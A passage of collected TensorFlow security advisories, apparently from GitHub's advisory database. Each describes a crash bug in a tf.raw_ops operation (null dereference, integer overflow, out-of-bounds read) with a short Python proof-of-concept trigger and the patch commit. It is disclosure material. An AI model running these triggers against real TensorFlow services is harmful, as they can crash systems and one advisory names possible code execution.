Source
ghsa
### Impact

When the parameter `summarize` of `tf.raw_ops.Print` is zero, the new method `SummarizeArray<bool>` will reference a nullptr, leading to a segfault.

```python
import tensorflow as tf

tf.raw_ops.Print(input=tf.constant([1, 1, 1, 1], dtype=tf.int32),
                 data=[[False, False, False, False], [False], [False, False, False]],
                 message='tmp/I',
                 first_n=100,
                 summarize=0)
```

### Patches

We have patched the issue in GitHub commit [6d423b8bcc9aa9f5554dc988c1c16d038b508df1](https://github.com/tensorflow/tensorflow/commit/6d423b8bcc9aa9f5554dc988c1c16d038b508df1). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us...

### Impact

TF version 2.11.0

```cpp
// tensorflow/core/ops/array_ops.cc:1067
const Tensor* hypothesis_shape_t = c->input_tensor(2);
std::vector<DimensionHandle> dims(hypothesis_shape_t->NumElements() - 1);
for (int i = 0; i < dims.size(); ++i) {
  dims[i] = c->MakeDim(std::max(h_values(i), t_values(i)));
}
```

If `hypothesis_shape_t` is empty, `hypothesis_shape_t->NumElements() - 1` causes an integer overflow, and then it will deadlock.

```python
import tensorflow as tf

para = {
    'hypothesis_indices': [[]],
    'hypothesis_values': ['tmp/'],
    'hypothesis_shape': [],
    'truth_indices': [[]],
    'truth_values': [''],
    'truth_shape': [],
    'normalize': False
}
tf.raw_ops.EditDistance(**para)
```

### Patches

We have patched the issue in GitHub commit [08b8e18643d6dcde00890733b270ff8d9960c56c](https://github.com/tensorflow/tensorflow/commit/08b8e18643d6dcde00890733b270ff8d9960c56c). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1.

### For...

### Impact

When `ctx->step_container()` is a null pointer, the `Lookup` function will be executed with a null pointer.

```python
import tensorflow as tf

tf.raw_ops.TensorArrayConcatV2(handle=['a', 'b'], flow_in=0.1, dtype=tf.int32, element_shape_except0=1)
```

### Patches

We have patched the issue in GitHub commit [239139d2ae6a81ae9ba499ad78b56d9b2931538a](https://github.com/tensorflow/tensorflow/commit/239139d2ae6a81ae9ba499ad78b56d9b2931538a). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by Yu Tian

### Impact

```python
import os
os.environ['TF_ENABLE_ONEDNN_OPTS'] = '0'
import tensorflow as tf
print(tf.__version__)

with tf.device("CPU"):
    ksize = [1, 40, 128, 1]
    strides = [1, 128, 128, 30]
    padding = "SAME"
    data_format = "NHWC"
    orig_input_shape = [11, 9, 78, 9]
    grad = tf.saturate_cast(tf.random.uniform([16, 16, 16, 16], minval=-128, maxval=129, dtype=tf.int64), dtype=tf.float32)
    res = tf.raw_ops.AvgPoolGrad(
        ksize=ksize,
        strides=strides,
        padding=padding,
        data_format=data_format,
        orig_input_shape=orig_input_shape,
        grad=grad,
    )
```

### Patches

We have patched the issue in GitHub commit [ddaac2bdd099bec5d7923dea45276a7558217e5b](https://github.com/tensorflow/tensorflow/commit/ddaac2bdd099bec5d7923dea45276a7558217e5b). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/ten...

### Impact

When `SparseSparseMaximum` is given invalid sparse tensors as inputs, it can give an NPE.

```python
import tensorflow as tf

tf.raw_ops.SparseSparseMaximum(
    a_indices=[[1]],
    a_values=[0.1],
    a_shape=[2],
    b_indices=[[]],
    b_values=[2],
    b_shape=[2],
)
```

### Patches

We have patched the issue in GitHub commit [5e0ecfb42f5f65629fd7a4edd6c4afe7ff0feb04](https://github.com/tensorflow/tensorflow/commit/5e0ecfb42f5f65629fd7a4edd6c4afe7ff0feb04). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by Yu Tian of Qihoo 360 AIVul Team

### Impact

Version: 2.11.0

```cpp
// core/ops/audio_ops.cc:70
Status SpectrogramShapeFn(InferenceContext* c) {
  ShapeHandle input;
  TF_RETURN_IF_ERROR(c->WithRank(c->input(0), 2, &input));
  int32_t window_size;
  TF_RETURN_IF_ERROR(c->GetAttr("window_size", &window_size));
  int32_t stride;
  TF_RETURN_IF_ERROR(c->GetAttr("stride", &stride));  // [1]

  DimensionHandle input_length = c->Dim(input, 0);
  DimensionHandle input_channels = c->Dim(input, 1);

  DimensionHandle output_length;
  if (!c->ValueKnown(input_length)) {
    output_length = c->UnknownDim();
  } else {
    const int64_t input_length_value = c->Value(input_length);
    const int64_t length_minus_window = (input_length_value - window_size);
    int64_t output_length_value;
    if (length_minus_window < 0) {
      output_length_value = 0;
    } else {
      output_length_value = 1 + (length_minus_window / stride);  // [2]
    }
    output_length = c->MakeDim(output_length_value);
  }
```

The value of `stride` is read at [1] and then used at [2].

```python
import tensorflow as tf
para = {'input': tf...
```

### Impact

Integer overflow occurs when 2^31 <= num_frames * height * width * channels < 2^32, for example a Full HD screencast of at least 346 frames.

```python
import urllib.request
dat = urllib.request.urlopen('https://raw.githubusercontent.com/tensorflow/tensorflow/1c38ad9b78ffe06076745a1ee00cec42f39ff726/tensorflow/core/lib/gif/testdata/3g_multiframe.gif').read()
import tensorflow as tf
tf.io.decode_gif(dat)
```

### Patches

We have patched the issue in GitHub commit [8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d](https://github.com/tensorflow/tensorflow/commit/8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by ...

### Impact

Attackers using TensorFlow can exploit the vulnerability. They can access heap memory that is not under the user's control, leading to a crash or RCE. When `axis` is larger than the dim of `input`, `c->Dim(input, axis)` goes out of bounds. The same problem occurs in the QuantizeAndDequantizeV2/V3/V4/V4Grad operations too.

```python
import tensorflow as tf

@tf.function
def test():
    tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5],
                                       input_min=[1.0],
                                       input_max=[10.0],
                                       signed_input=True,
                                       num_bits=1,
                                       range_given=True,
                                       round_mode='HALF_TO_EVEN',
                                       narrow_range=True,
                                       axis=0x7fffffff)

test()
```

### Patches

We have patched the issue in GitHub commit [7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb](https://github.com/tensorflow/tensorflow/commit/7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow...

### Impact

If the stride and window size are not positive for `tf.raw_ops.AvgPoolGrad`, it can give an FPE.

```python
import tensorflow as tf
import numpy as np

@tf.function(jit_compile=True)
def test():
    y = tf.raw_ops.AvgPoolGrad(orig_input_shape=[1,0,0,0], grad=[[[[0.39117979]]]], ksize=[1,0,0,0], strides=[1,0,0,0], padding="SAME", data_format="NCHW")
    return y

print(test())
```

### Patches

We have patched the issue in GitHub commit [1295ae4dbb52fe06b19733b0257e2340d7b63b8d](https://github.com/tensorflow/tensorflow/commit/1295ae4dbb52fe06b19733b0257e2340d7b63b8d). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by r3pwnx of 360 AIVul Team

### Impact

NPE in `QuantizedMatMulWithBiasAndDequantize` with MKL enabled.

```python
import tensorflow as tf

func = tf.raw_ops.QuantizedMatMulWithBiasAndDequantize
para = {
    'a': tf.constant(138, dtype=tf.quint8),
    'b': tf.constant(4, dtype=tf.qint8),
    'bias': [[31.81644630432129, 47.21876525878906], [109.95201110839844, 152.07968139648438]],
    'min_a': 141.5337138686371,
    'max_a': [73.84139251708984, 173.15280151367188],
    'min_b': [],
    'max_b': [[16.128345489501953, 193.26820373535156]],
    'min_freezed_output': [],
    'max_freezed_output': [115.50032806396484, 156.974853515625],
    'Toutput': 1.0,
    'transpose_a': True,
    'transpose_b': False,
    'input_quant_mode': 'MIN_FIRST'
}
func(**para)
```

### Patches

We have patched the issue in GitHub commit [8a47a39d9697969206d23a523c977238717e8727](https://github.com/tensorflow/tensorflow/commit/8a47a39d9697969206d23a523c977238717e8727). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information...